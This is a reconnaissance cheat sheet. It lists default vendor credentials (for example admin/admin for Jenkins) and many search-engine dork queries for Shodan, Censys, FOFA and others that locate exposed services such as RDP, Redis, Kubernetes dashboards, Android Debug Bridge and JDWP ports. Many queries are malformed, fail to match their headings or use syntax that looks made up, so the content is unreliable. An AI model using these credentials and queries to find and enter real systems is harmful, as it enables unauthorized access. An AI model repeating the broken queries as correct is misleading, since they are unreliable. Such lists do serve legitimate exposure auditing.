Tips and Tricks

Tips and tricks

Default Credential

S/P
username
password

Jenkins

admin

admin

AWS EC2

ec2-user

N/A (use SSH key)

AWS RDS

N/A (use IAM credentials)

N/A (use IAM credentials)

AWS S3

N/A (use IAM credentials)

N/A (use IAM credentials)

Azure VM

azureuser

N/A (use SSH key)

Azure SQL Database

N/A (use Azure AD authentication or SQL Server authentication)

N/A (use Azure AD authentication or SQL Server authentication)

Google Compute Engine

N/A (use project-level SSH key)

N/A (use project-level SSH key)

Google Cloud SQL

N/A (use Cloud SQL Proxy or SSL/TLS certificate)

N/A (use Cloud SQL Proxy or SSL/TLS certificate)

Docker

root

N/A

Kubernetes

N/A

N/A (use Kubernetes authentication mechanisms)

OpenStack

ubuntu

ubuntu

VMware ESXi

root

N/A

Cisco IOS

cisco

cisco

Juniper Junos

root

juniper123

more: https://github.com/ihebski/DefaultCreds-cheat-sheet

Dork

shodan
censys
securitytrails
greynoise
binaryedge
zoomeye
Netlas
fofa
huntr
leakix

Nginx

β€œnginx” http.component:nginx

β€œnginx” AND tags:web AND tags:https

http.html_body.server:nginx

service.name:nginx

http.servers:nginx

app:”nginx”

http.server:nginx

title=”nginx” || header=”nginx”

http.servers=”nginx”

server:nginx

Apache

β€œapache” http.component:apache

β€œapache” AND tags:web AND tags:https

http.html_body.server:apache

service.name:apache

http.servers:apache

app:”apache”

http.server:apache

title=”apache” || header=”apache”

http.servers=”apache”

server:apache

Phpmyadmin

Server: phpmyadmin

org asn

asn:ASXXXXXXX org:

asn:ASXXXXXXX AND tags:

include:asn:ASXXXXXXX AND type:organization

asn:ASXXXXXXX organization:

asn:ASXXXXXXX organization:

asn:ASXXXXXXX org:

asn:ASXXXXXXX org:

header=”ASXXXXXXX” && title=” "

asn:ASXXXXXXX organization:

asn:ASXXXXXXX org:

elasticsearch

product:elasticsearch

elasticsearch.protocol:tcp

os:elasticsearch

port:9200

elasticsearch

app:”Elasticsearch” port:”9200”

product:”Elasticsearch”

title=”Elasticsearch” || body=”Elasticsearch” || header=”Elasticsearch”

product:”elasticsearch”

title:”kibana” && title:”elastic”

Minio

http.html:” β€œ

(443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names: minio.*)

ssl.cert_subject_alt_name: minio

metadata.product: β€œMinIO”

β€œhttp.component:Minio” OR β€œhttp.title:Minio”

title:Minio

http.title:”Minio”

title=”MinIO” || header=”Minio” || header=”X-Amz-Bucket-Region”

intitle:”MinIO”

intitle:”MinIO”

kuberneties

β€œkubernetes port:6443”

β€œ443.https.get.body: β€œkubernetes””

β€œkubernetes.*.cloudapp.azure.com”

β€œtags:kubernetes”

β€œtitle:”kubernetes-dashboard””

β€œapp:”kubernetes-dashboard””

β€œapp:”kubernetes-dashboard””

β€œtitle=”Kubernetes Dashboard” || header=”kubernetes””

β€œtitle:”kubernetes dashboard””

β€œtitle:”Kubernetes Dashboard””

mssql

product:”Microsoft SQL Server”

443.https.get.body:”microsoft sql server” OR 1433.banner:”microsoft sql server”

http.html_content:”Microsoft SQL Server” OR http.html_content:”MSSQLSERVER”

tags:”mssql” OR tags:”microsoft sql server”

product:”Microsoft SQL Server”

app:”Microsoft SQL Server”

title:”Microsoft SQL Server” OR body:”Microsoft SQL Server” OR body:”MSSQLSERVER”

title=”Microsoft SQL Server” || header=”Microsoft SQL Server”

title:”Microsoft SQL Server” OR body:”Microsoft SQL Server”

server:Microsoft-IIS/8.5 intitle:”sql server login”

rdp

β€œrdp” OR β€œport:3389”

3389.rdp.banner:”\x03\x00\x00\x0b\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00”

β€œrdp” AND port:3389

β€œtags.rdp” OR β€œtags.mstsc”

β€œrdp” AND port:3389

β€œrdp” OR β€œport:3389”

β€œrdp” OR β€œport:3389”

β€œprotocol=rdp” OR β€œport=3389”

β€œrdp” OR β€œport:3389”

β€œrdp” OR β€œport:3389”

ftp

β€œftp”

β€œservice.ftp.banner”

β€œservice:ftp”

β€œprotocol:ftp”

β€œftp”

β€œftp”

β€œftp”

β€œprotocol==ftp”

β€œftp”

β€œftp”

ssh

port:22 ssh

22.ssh.banner.raw_version: SSH

22 || ssh

/ssh/ && port:22

ssh port:22

port:22 ssh

port:22 AND service.ssh==true

protocol=ssh

22.ssh.banner.raw_version:SSH

service.ssh == true

dns

hostname:{DNS name}

parsed.names: {DNS name}

domain:{DNS name}

metadata.dns: {DNS name}

dns.name:{DNS name}

site:{DNS name}

dns.host: {DNS name}

domain={DNS name}

domain:{DNS name}

data.hostnames: {DNS name}

modbus

port:502 modbus

modbus

port:502

modbus

port:502

port:502 modbus

port:502 modbus

protocol=modbus

port:502

port:502 modbus

rtsp

port:554 rtsp

protocols: rtsp

port:554

protocols:rtsp

port:554 rtsp

port:554 rtsp

protocol:rtsp

protocol=rtsp

protocol:rtsp

port:554

SMTP

smtp

protocols:smtp

smtp

port:25

port:25

service:smtp

service:smtp

protocol==smtp

smtp

port.tcp eq 25

SMB

smb

protocols.smb.banner.signatures.name: β€œSMB”

tags.smb = true

metadata.protocol = smb

protocols:”smb”

app:”SMB/CIFS”

service:”smb”

protocol=”smb”

tags:”smb”

protocol:smb

NFS

port:2049 nfs

protocols:”nfs”

port:2049 AND service:nfs

tag:nfs

port:2049 nfs

app:”nfsd”

nfs

title=”NFS” || body=”NFS” || header=”NFS” || keyword=”NFS”

port:2049 AND service:nfs

port:2049 nfs

Docker registries

http.title:”Docker Registry”” OR β€œhttp.html:”Docker Registry”” OR β€œhttp.component:”docker”” OR β€œhttp.component:”registry”

443.https.get.metadata.protocol: Docker

http.headers.server: docker-registry” OR β€œhttp.html: docker-registry” OR β€œhttp.title: docker-registry

http.metadata.product: Docker Registry

http.component:docker-registry

title:”Docker Registry”” OR β€œbody:”Docker Registry”

product:”Docker Registry”

title=”Docker Registry”” OR β€œheader=”docker-registry”” OR β€œbody=”docker-registry”

docker-registry

http.component:”docker-registry”

memcached

port:11211 memcached

protocols: β€œmemcached”

type:server β€œmemcached” port:11211

service:memcached

port:11211 && memcached

port:”11211” memcached

port:11211 && memcached

title=”Memcached” && protocol=”port:11211”

port: 11211 AND tags: memcached

protocols:”memcached” port:”11211”

RabbitMQ

product:rabbitmq

443.https.get.body:/{β€œproduct”:”RabbitMQ”,”version”:”

http.html: /management/rabbitmq/

port:5672 (RabbitMQ) AND tags:RabbitMQ

title:”RabbitMQ Management”

app:”RabbitMQ Management”

port:5672 AND product:rabbitmq

title=”RabbitMQ Management” || body=”RabbitMQ” || header=”RabbitMQ”

port:5672 AND service.name:rabbitmq

product:rabbitmq

WinRM

product:winrm

protocols:winrm

os:windows winrm

winrm

winrm

port:5985 winrm

service:WinRM

protocol==winrm

winrm

winrm

CouchDB

couchdb port:5984

protocols: β€œcouchdb” and port: 5984

http.component: β€œcouchdb” and port: 5984

http.server: β€œCouchDB” and port: 5984

protocols:couchdb and port:5984

app:”CouchDB” and port:5984

port:5984 and app:couchdb

title=”couchdb” && port=5984

couchdb inurl:5984

app:couchdb && port:5984

PostgreSQL

port:5432 postgres

443.versions.protocol: β€œPostgreSQL” or 5432.versions.protocol: β€œPostgreSQL”

pgsql-server

port:5432

service:”postgresql”

port:”5432”

title:”pgAdmin” OR title:”PostgreSQL” OR title:”pgAdmin 4” OR title:”pgAdmin 3”

title=”Adminer” || body=”pgsql” || body=”PostgreSQL”

title:”postgresql” OR body:”postgresql”

pgsql-server

Gitlab

http.favicon.hash:-335242539 β€œgitlab”

443.https.get.metadata.server: GitLab

http.headers.server:”gitlab”

metadata.service:gitlab

title:”GitLab” && protocols:”https”

title:”GitLab”

http.favicon.hash:-335242539 β€œgitlab”

title=”GitLab”

title=”GitLab”

title=”GitLab”

SVN

Server: Apache SVN

tags: svn

svn

/svn/index.cgi

title:”viewvc” svn

port: 3690 svn

os:svn

title=”ViewVC” || title=”SVN repository browser” || title=”VisualSVN Server” || body=”Powered by Subversion version”

svn

svn

Tomcat

tomcat country:XX

protocols: β€œhttp” and β€œproduct:Apache Tomcat”

http.web_server.name:”Apache Tomcat”

metadata.product:tomcat

http.server.product:”Apache Tomcat”

app:”Tomcat”

product:Tomcat

title=”Apache Tomcat” || body=”Apache Tomcat”

http.favicon.hash: -1448465410 && http.html: β€œApache Tomcat”

os.query:”Apache Tomcat”

VNC

β€œvnc” port:5900

port: β€œ5900” AND β€œVNC protocol”

β€œvnc” AND port:5900

β€œvnc” -port:5900

protocol:”vnc” AND port:5900

port:5900 AND app:”RealVNC”

service:”vnc” port:”5900”

port=”5900” && protocol=”vnc”

vnc AND port:5900

β€œvnc” port:5900

LDAP

β€œldap” port:389 or port:636

tags: ldap

service:ldap

tag:ldap

service:”LDAP (389/tcp)” or service:”LDAP SSL (636/tcp)”

app:”openLDAP” or app:”ActiveDirectory”

service.ldap.banner:”ldap”

protocol==LDAP

service:ldap

port:389 or port:636

NetBIOS

port:”137” org:”" or netbios_name:""

protocols: β€œnetbios-ssn” or netbios.name: β€œ"

netbios_host: or netbios_host:

netbios

netbios.domain: β€œ" or netbios.host:

netbios.name: or netbios.ip:

netbios.host:

protocol=”NetBIOS” && cert=””

netbios

netbios

TeamViewer

product:teamviewer

443.versions.banner:TeamViewer

os:’Windows 7’ && port:5938 && app:’TeamViewer’

metadata.teamviewer.enabled:true

product:’TeamViewer’ && type:’host’

app:teamviewer

teamviewer

title=”TeamViewer” || header=”TeamViewer”

service:”TeamViewer”

port.tcp eq 5938 and port.tcp eq 443 and product eq β€˜TeamViewer’

NoMachine

β€œnomachine” port:4000, β€œnomachine” port:4010, β€œnomachine” port:4011, β€œnomachine” port:4022

β€œnomachine” and port:4000 or port:4010 or port:4011 or port:4022

service:”nomachine” and (port:4000 or port:4010 or port:4011 or port:4022)

β€œnomachine” port:4000 or port:4010 or port:4011 or port:4022

service:nomachine and (port:4000 or port:4010 or port:4011 or port:4022)

app:”NoMachine” port:4000 or port:4010 or port:4011 or port:4022

service:”nomachine” and (port:”4000” or port:”4010” or port:”4011” or port:”4022”)

title=”NoMachine” && (port=4000 || port=4010 || port=4011 || port=4022)

nomachine AND (port:4000 OR port:4010 OR port:4011 OR port:4022)

tags.nomachine AND (ports:4000 OR ports:4010 OR ports:4011 OR ports:4022)

vCenter

β€œvCenter” port:443

443.https.get.metadata.product:VMware-vCenter-Server

http.title:”vCenter Server”

tags:”vmware-vcenter”

title:”vSphere Client”

app:”VMware vSphere”

http.html_contains:”vmware-vsphere-client”

title=”VMware vCenter Server” || body=”vCenter Server” || header=”vCenter Server”

service.name:VMware-vSphere

product:”VMware vCenter Server”

ESXi

product:ESXi

os: vmware_esxi

os:’VMware ESXi’

tag:VMware-ESXi

os:’VMware ESXi’

webapp:VMware ESXi

os:VMware ESXi

title=’VMware ESXi’

service.name:VMware ESXi

product:’VMware ESXi’

directory listings

β€œServer: -frontier -akamai -edgecast -fastly -incapsula -nginx -squarespace -cdn -amazonaws -cloudfront -gstatic -github”

β€œprotocols: http and 200.status_code:/2[0-9][0-9]/ and body: β€œIndex of /” and not (body: β€œHTTP/1.1 301” or body: β€œHTTP/1.1 302” or body: β€œHTTP/1.1 303” or body: β€œHTTP/1.1 307” or body: β€œHTTP/1.1 308”)”

http.title:/index of/i

metadata.product:apache && metadata.title:/index of/i

http.html.body:/Index of/i && http.status.code:200

web.title:/index of/i

http.title:/index of/i

title=”Index of /” && protocol=”http” && status_code=”200”

http.body:/index of/i && http.status_code:200

title:”Index of /” && protocol:http

SOCKS

β€œsocks” port:1080

β€œsocks” AND port:1080

port:1080 AND protocol:socks5

β€œsocks” AND port:1080

β€œSOCKS5” AND port:1080

β€œSOCKS5” && port:”1080”

β€œSOCKS” port:”1080”

β€œSOCKS5” && port=”1080”

β€œSOCKS5” port:1080

protocol:SOCKS5 port:1080

V2Ray

v2ray

tags.v2ray

v2ray

v2ray

v2ray

v2ray

v2ray

protocol==”v2ray”

v2ray

v2ray

Squid

http.component: squid

80.http.get.headers.server: squid

HTTP.headers.server: squid

http.server_header: squid

http.component: squid

app:Squid

http.component.product: squid

title=”Squid Cache” && protocol=”http” && port=3128

Squid proxy server” OR β€œSquid proxy cache

intext:”Squid Object Cache”

PRTG

product:prtg port:80” or β€œproduct:prtg port:443

443.https.get.body: β€˜PRTG Network Monitor’” or β€œ80.http.get.body: β€˜PRTG Network Monitor’

text:’PRTG Network Monitor’ AND port:80” or β€œtext:’PRTG Network Monitor’ AND port:443

http.user_agent: β€˜PRTG’ OR http.title: β€˜PRTG’

product:PRTG” or β€œbody:PRTG Network Monitor

app:PRTG Network Monitor” or β€œheader.server:PRTG Network Monitor

β€œprtg” or β€œprtg network monitor”

β€œtitle=”prtg” || body=”prtg”” or β€œprotocol=”http” && body=”prtg””

β€œprtg” or β€œprtg network monitor”

β€œproduct:PRTG” or β€œPRTG Network Monitor”

WebDAV

Server: Microsoft-IIS/7.5 intitle: β€œWebDAV” OR β€œWebDAV MiniRedir”

80.http.get.headers.server: Microsoft-IIS/7.5 && title:”WebDAV MiniRedir”

http.headers.server:/Microsoft-IIS/7.5/ && title:”WebDAV MiniRedir”

80.http.get.headers.server: Microsoft-IIS/7.5 && title:”WebDAV MiniRedir”

http.server: Microsoft-IIS/7.5 && html.title: β€œWebDAV MiniRedir”

server:Microsoft-IIS/7.5 && title:”WebDAV MiniRedir”

http.server: Microsoft-IIS/7.5 && http.title: β€œWebDAV MiniRedir”

β€œtitle=”WebDAV” && header=”Microsoft-IIS/7.5”

http.title:”WebDAV” && http.headers.server:”Microsoft-IIS/7.5”

http.title: β€œWebDAV” && http.headers.server: β€œMicrosoft-IIS/7.5”

IIS

β€œServer: Microsoft-IIS” OR β€œServer: Microsoft-HTTPAPI”

β€œ443.https.get.title: IIS” OR β€œ80.http.get.title: IIS”

β€œhttp.headers.server: Microsoft-IIS” OR β€œhttp.headers.server: Microsoft-HTTPAPI”

β€œhttp.server: Microsoft-IIS” OR β€œhttp.server: Microsoft-HTTPAPI”

β€œserver: Microsoft-IIS” OR β€œserver: Microsoft-HTTPAPI”

β€œwebapp=”IIS”” OR β€œwebserver=”IIS””

β€œhttp.favicon.hash:-1137975641 AND http.server:”Microsoft-IIS”” OR β€œhttp.favicon.hash:-1137975641 AND http.server:”Microsoft-HTTPAPI””

β€œprotocol==http && header==”Server: Microsoft-IIS”” OR β€œprotocol==http && header==”Server: Microsoft-HTTPAPI””

β€œiis” OR β€œmicrosoft-iis”

β€œhttp.server.name: Microsoft-IIS” OR β€œhttp.server.name: Microsoft-HTTPAPI”

Redis

port:6379 product:redis

ports: β€œ6379” AND tags.raw: β€œredis”

(β€œredis” AND port:6379)

redis.server

protocols:”redis” -os:”Windows”

redis port:6379

service:redis port:6379

title=”Redis” && protocol=”redis”

port:”6379” AND protocol:”redis”

port:6379 AND Redis

Cisco Smart Install

Server: Cisco-SMI

443.issmartinstall:true

fingerprint: β€œDevice Type: Cisco Smart Install Client”

/cgi-bin/discovery/

title:Cisco Smart Install - Configuration Assistant

product:Cisco Smart Install

title:Cisco Smart Install

header=’X-Remote-Addr’ && title=’Cisco Smart Install’

http.favicon.hash:-1300641209 && http.title:’Cisco Smart Install’

product:Cisco Smart Install

InfluxDB

β€œInfluxDB” port:8086

(open_influxdb.port: 8086)

http.title:”InfluxDB Admin”

β€œinfluxdb” -service.version:1.8

http.component:influxdb

title:”InfluxDB” port:8086

port:8086 service:InfluxDB

title=”InfluxDB” || body=”InfluxDB”

type:service InfluxDB

server:”InfluxDB”

Cassandra

β€œcassandra” port:9042

β€œcassandra” AND port:9042

port:9042 AND β€œcassandra”

β€œcassandra” AND tags:{β€œcassandra”}

β€œcassandra” AND port:”9042”

β€œcassandra” port:”9042”

β€œcassandra” port:9042

title=”cassandra” && port=9042

β€œcassandra” AND port:”9042”

β€œcassandra” AND port:”9042”

GlusterFS

β€œGlusterFS”

443.versions = β€œGlusterFS”

GlusterFS

http.favicon.hash:-434599080 β€œgluster”

service.glusterfs.banner: β€œGlusterFS”

app:”GlusterFS”

http.favicon.hash:-434599080 β€œgluster”

title=”Gluster Management Console” || body=”GlusterFS” || header=”Gluster”

title:”GlusterFS Management Console”

service:/glusterfs/

Hadoop

β€œhadoop” port:”50070” or β€œhadoop” port:”8088”

product:Hadoop

β€œos:Linux” β€œhadoop”

β€œ50070” || β€œ8088” && β€œhadoop”

β€œhadoop” in_service:”50070, 8088”

β€œhadoop” port:”50070” or β€œhadoop” port:”8088”

service.name:hadoop

title=”Hadoop NameNode”” or β€œtitle=”Hadoop Resource Manager”

title:”hadoop cluster overview”

hadoop

Fortigate

http.favicon.hash:728337045 && title:”Fortinet - Login”

443.https.get.title:”Fortinet”

http.html:”Fortinet”

port:443 http.html:”FortiGate”

title:”Fortinet FortiGate”

title:”Fortinet FortiGate Login”

http.title:”FortiGate”

title=”Fortinet FortiGate Login” || header=”Fortinet” || body=”Fortinet”

fortigate

JDWP

jdwp country:”" port:"8000"

443.jdwp

(β€œjava.debugwire”)

jdwp

jdwp

app:”JDWP-Debug-Interface”

port=8000 protocol=TCP service=JDWP

title=”Apache Tomcat”

jdwp

IPsec

β€œikev2.probe(500)” or β€œikev2.probe(4500)” or β€œipsec.probe()”

β€œprotocols: β€˜ikev2’ or protocols: β€˜ipsec’”

β€œikev2” or β€œipsec”

β€œport:500 or port:4500 or port: 1701 and tags:ipsec”

β€œprotocols:ikev2 or protocols:ipsec”

β€œipsec” or β€œikev2”

β€œikev2” or β€œipsec”

β€œtitle=”Fortinet Firewall Login” && body=”/remote/login” && body=”/tmui/login.jsp/” && body=”/remote/login?lang=en” && body=”/remote/login?lang=en_US” && body=”/remote/login?lang=es” && body=”/remote/login?lang=es_US””

β€œservice.name:”IPSec”” or β€œservice.name:”IKEv2””

β€œprotocol:ipsec” or β€œprotocol:ikev2”

Splunkd

product:splunkd

443.https.get.metadata.product: Splunkd

http.html: /en-US/splunkd/

metadata.splunkd.server != null

product: Splunkd

app:Splunk

Splunkd

title=”Splunk” && header=”Splunkd”

title:splunkd

splunkd

Android Debug Bridge

β€œAndroid Debug Bridge” port:5555

80.http.get.headers.server:”Android Debug Bridge”

server:adb

metadata.service == β€œadb”

service:”android debug bridge (adb)”

app:”Android Debug Bridge”

http.component:”Android Debug Bridge”

app=”Android Debug Bridge” || header=”Android Debug Bridge”

http.headers.server:”Android Debug Bridge”

http.server.version:”Android Debug Bridge”

OpenCTI

http.favicon.hash:-1693683099

443.https.tls.certificate.parsed.extensions.authority_key_id:0a11b3211d2e25545ed61a568a78545c

app=nginx port:443

80.http.get.body.sha256:8f2c29dbae3b1cbbe10d59d8ed144c5999329fa974aa06f529ee550dc6341e2c

http.component:nginx

title:’OpenCTI’

ssl://title:OpenCTI

title=”OpenCTI” || header=”X-Opencti-Path” || header=”X-Opencti-User”

Server: nginx intitle:”OpenCTI”

title:”OpenCTI”

Wazuh

wazuh auth_token” or β€œtitle:Wazuh

443.https.get.body_sha256:XV8WbTtTSPBOnQ2R26dA9XFeOXXz0vVdNllZlf0u0LQ

generic.server:Wazuh

metadata.product:wazuh

wazuh

title:Wazuh

Wazuh

app=”Wazuh”

wazuh

app:wazuh

Vault

β€œVault Server” port:8200

443.https.tls.certificate.parsed.extensions.subject_alt_name: .vault

ssl.cert_subject_alt_name: .vault

http.html_hash:3896359815

html:” β€œ

title:”Vault”

title:”Vault”

title=”Vault” && port=8200

title:”Vault”

β€œvault” port:8200

Rocket.Chat

product:”Rocket.Chat”

443.https.get.metadata.software:Rocket.Chat

http.html_body:”Rocket.Chat”

http.user_agent:”Rocket.Chat”

http.favicon.hash:-1788329738

title:”Rocket.Chat”

title:”Rocket.Chat”

title=”Rocket.Chat”

title:”Rocket.Chat”

http.title:”Rocket.Chat”

Mattermost

http.favicon.hash:1565243809

443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:mattermost.*

https.cert.subject.common_name:mattermost.*

metadata.product: mattermost

protocols:https && service.metas.product:mattermost

app:”Mattermost”

http.url.path:/api/v4/users

title=”Mattermost” || header=”mattermost”

body:”content”:”Mattermost”

https://leakix.net/search?query=mattermost

Gitter

title:”gitter” http.component:”gitter”

443.https.tls.certificate.parsed.names: β€œgitter.im”

β€œgitter.im”

http.user_agent:”Mozilla/5.0 (compatible; Gitter)” or http.user_agent:”com.gitter”

http.component:Gitter or ssl.cert.issuer.cn:gitter

title:”Gitter” or header:”X-Powered-By: Gitter”

host:gitter.im

title=”Gitter” || domain=”gitter.im”

title:”Gitter”

domain:gitter.im

Confluence

title:”Dashboard - Confluence” http.favicon.hash:-335242539 β€œX-ASEN” -gitlab

443.https.tls.certificate.parsed.subject.common_name:”*.atlassian.net” and 443.https.tls.certificate.parsed.subject.organization:Atlassian

http.html: /loginpage.action/i and http.html: /forgotlogin/

http.server:Apache-Coyote/1.1 http.title:Confluence

title:”Dashboard - Confluence” and protocols:https

app:”Confluence-Atlassian”

http.favicon.hash:-335242539 title:”Dashboard - Confluence”

title=”Dashboard - Confluence”

title:”Log in - Confluence”

title:”Log in - Confluence”

Jira

β€œJira” port: 80, 443, 8080, 8443

β€œJira” AND protocols: (β€œ80/http” OR β€œ443/https” OR β€œ8080/http-proxy” OR β€œ8443/https-alt”)

β€œjira” OR β€œatlassian” OR β€œjira.example.com” OR β€œatlassian.example.com”

metadata.product:jira

title:”JIRA - Login” OR body:”powered by Atlassian JIRA”

app:”Jira”

β€œjira” AND protocols: (β€œhttp” OR β€œhttps”)

title=”Jira - Login” || header=”atlassian” || domain=”atlassian.net” || domain=”atlassian.com”

β€œjira” OR β€œatlassian”

product:”jira” OR app:”jira”

Element Matrix

product:”Element Matrix Server”

443.https.get.title:”Element Matrix Services”

http.html_title:”Element Matrix Services”

http.html_title:”Element Matrix Services”

title:”Element Matrix Services”

app:”Element Matrix Services”

app:”Element Matrix Services”

title=”Element Matrix Services”

title:”Element Matrix Services”

title:”Element Matrix Services”

SonarQube

product:”SonarQube” port:”9000”

443.https.get.title:”SonarQube”

http.title:”SonarQube”

http.html_title:”SonarQube”

http.title:”SonarQube”

title:”SonarQube”

title:”SonarQube”

title=”SonarQube”

SonarQube

intext:”sonarqube” AND intext:”rights reserved”

Portainer

port:9000 portainer

443.https.get.headers.server: portainer

http.html: β€œPortainer” && http.url: β€œ/api/status”

http.request.method: GET && http.request.uri.path: /api/status && http.response.body: Portainer

http.component:portainer && http.component_category: application

app:”Portainer” && port:”9000”

port:9000 AND service:portainer

title=”Portainer” && header=”Powered by Portainer” && protocol=”https”

title:”Portainer”

title:”Portainer”

Terraform

product:terraform

terraform

terraform

product:terraform

product:terraform

app:terraform

product:terraform

title=”Terraform Enterprise” || header=”Terraform-Backend”

terraform

terraform

DefectDojo

product:DefectDojo

443.https.get.body_sha256:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

http.html_hash:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

metadata.product:DefectDojo

http.html.hash.sha256:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

title:”DefectDojo” || body:”DefectDojo”

app.name:”DefectDojo”

title=”DefectDojo”

http.html_hash:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

http.html_hash:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

Zabbix

zabbix

product:zabbix

zabbix

zabbix

zabbix

zabbix

zabbix

title=”Zabbix” || body=”Zabbix”

Zabbix

Zabbix

Sentry

Server: Sentry

443.https.get.body_sha256: contains c0b207c6b18d6a12a6d740f328d137a23972915f6c3e3e3a6f79d125d9ba9522

app: Sentry

http.user_agent: sentry*

http.favicon.hash: 1103164611

app:Sentry

title:Sentry

title=sentry

process_name:sentry*

product:Sentry

Grafana

grafana

443.https.get.title:grafana

https.html_title:”Grafana”

http.useragent:”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36” http.html_title:”Grafana”

port:3000 title:”Grafana”

app:grafana

http.title:grafana

title=”Grafana” || header=”grafana” || body=”grafana”

https://grafana.*

grafana

Nagios

β€œNagios/HTTP” or β€œNagios Core” or β€œNagios XI”

β€œnagios” or β€œhttp.favicon.hash:-1301254336” and β€œhttp.title:Nagios Core”

β€œnagios” or β€œhttp.html_hash:1875409680”

Nagios

title:”Nagios Core”

app:Nagios

http.html: β€œNagios Core”

title=”Nagios Core” || body=”Nagios Core”” or β€œtitle=”Nagios XI” || body=”Nagios XI”

Nagios

Nagios

Nextcloud

nextcloud

443.https.get.body_sha256:65db03f60e82d7c34a6b9455948f975931c90476e90e408d20f2af2db4699f25

nextcloud

http.html_body:nextcloud

product:”Nextcloud”

title:”Nextcloud”

http.favicon.hash:-575579963

title=”Nextcloud” || header=”Nextcloud” || html=”Nextcloud”

nextcloud

https://$DOMAIN/ocs/v2.php/apps/notifications/api/v1/notifications

ZooKeeper

zookeeper

443.ports and product:zookeeper

service.name: zookeeper

tags: zookeeper

protocols: β€˜zookeeper’

app:ZooKeeper

service:’zookeeper’

app=”ZooKeeper”

title:”ZooKeeper”

product:zookeeper

Microsoft Exchange

β€œmicrosoft exchange” port:25

80.http.get.title:exchange

β€œmicrosoft exchange” in:hostname

service:smtp app:”Microsoft Exchange”

β€œmicrosoft exchange” port:25

β€œMicrosoft Exchange Server” port:”25”

β€œMicrosoft Exchange” port:25

title=”Outlook Web App”

β€œmicrosoft exchange” port:25

app:”Microsoft Exchange” port:”25”

Skype for Business

β€œskype for business” port:5061

β€œskype for business” AND port:5061

service.name:”skype” AND service.name:”tls” AND service.port:5061

β€œskype for business”

Microsoft Skype for Business Server 2015” OR β€œMicrosoft Skype for Business Server 2019

app:”skype for business

skype for business” AND port:5061

title=”Skype for Business”

skype for business

skype for business

Microsoft Teams

product:Microsoft Teams

443.https.get.metadata.server: Microsoft-IIS/10.0 AND 443.https.tls.certificate.parsed.subject.organization:Microsoft Corporation AND 443.https.tls.certificate.parsed.subject.organizational_unit:Microsoft Teams

dns.nameservers:*.teams.microsoft.com

http.user_agent:teams AND tags.service:Teams

protocols:’microsoft-teams’

app:’Microsoft Teams’

microsoft teams

title=”Microsoft Teams” || body=”Microsoft Teams”

Microsoft Teams

Microsoft Teams

Celery

β€œcelery” http.component:”celery”

celery

celery

celery

celery

celery

celery

β€œtitle=c”elery” || body=c”elery””

celery

celery

RabbitMQ

product:rabbitmq

443.https.get.body:”RabbitMQ” or 8883.tls.tls.certificate.parsed.extensions.authority_key_identifier.0.key_identifier:”RabbitMQ Server”

ssl_certificate.subject.common_name:rabbitmq*

metadata.product:rabbitmq

protocols:”amqp” && product:”RabbitMQ”

app:”RabbitMQ Management”

title:”RabbitMQ Management”

title=”RabbitMQ Management” || body=”RabbitMQ” || header=”RabbitMQ”

title:”RabbitMQ Management”

http.component:RabbitMQ

Kafka

org.apache.kafka.common.security.authenticator” http.component:”http” -β€œ303”

metadata.protocol: β€œKafka”

http.title:”kafka” OR http.title:”Apache Kafka” OR http.body:”kafka” OR http.body:”Apache Kafka”

β€œorg.apache.kafka.common.security.authenticator” http.component:”http” -β€œ303”

β€œkafka” OR β€œApache Kafka”

β€œKafka” OR β€œApache Kafka”

org.apache.kafka.common.security.authenticator” http.component:”http” -β€œ303”

title=”Kafka” OR header=”Apache Kafka”

org.apache.kafka.common.security.authenticator” http.component:”http” -β€œ303”

org.apache.kafka.common.security.authenticator” http.component:”http” -β€œ303”

OpenStack

openstack

openstack

openstack

openstack

openstack

openstack

openstack

openstack

openstack

app=”openstack”

SaltStack

Server: SaltStack

product:SaltStack

http.favicon.hash:-1102536065 AND http.html_hash:1540850741

os:saltstack

title:”SaltStack Enterprise”

SaltStack

SaltStack

title=”SaltStack” || body=”SaltStack” || header=”SaltStack”

saltstack

title:saltstack

OpenShift

Server: openshift

openshift

openshift

service.openshift

title:”openshift web console login”

app:openshift

openshift

title=”OpenShift Web Console” || body=”Powered by OpenShift”

openshift

openshift

Ceph

β€œceph” port:6789

(443.ceph.cluster_name:) OR (7480.ceph.cluster_name:) OR (80.ceph.cluster_name:*)

β€œCeph” OR β€œCeph dashboard”

β€œCeph MON” OR β€œCeph OSD” OR β€œCeph RadosGW”

β€œceph” AND open_ports:6789

β€œceph” port:”6789”

β€œCeph” OR β€œCeph dashboard”

β€œtitle=”Ceph” || body=”Ceph” || h1=”Ceph””

β€œtitle:Ceph” OR β€œintext:Ceph” OR β€œh1:Ceph”

ceph

Swagger

title:”swagger ui” or title:”swagger” http.favicon.hash:-1840653542

443.https.get.body.tags.name:”swagger-ui” or 443.https.get.body.tags.name:”swagger”

http.title:”swagger ui” or http.title:”swagger”

metadata.service_name:”swagger-ui” or metadata.service_name:”swagger”

title:”swagger ui” or title:”swagger”

title:”swagger ui” or title:”swagger”

title:”swagger ui” or title:”swagger”

title=”Swagger” || title=”Swagger UI”

body:”swagger-ui” or body:”swagger”

title:”swagger ui” or title:”swagger”

Prometheus

http.favicon.hash:-335242539 β€˜Prometheus Time Series Collection and Processing Server’

product:prometheus

http.headers.server:prometheus

http.useragent:’prometheus’

http.favicon.hash:-335242539 AND http.server.header:’prometheus’

app:’Prometheus’ header:’Prometheus’ product:’Prometheus’

http.favicon.hash:-335242539 http.headers.server:prometheus

header=Prometheus” OR β€œbody=Prometheus

http.favicon.hash:-335242539 AND http.server.header:’prometheus’

http.favicon.hash:-335242539 AND http.response.body:Prometheus

Redmine

http.component:”redmine” && http.title:”Redmine”

443.https.get.metadata.product: β€œRedmine”

http.html: β€œRedmine” OR http.html: β€œRedmine - Error”

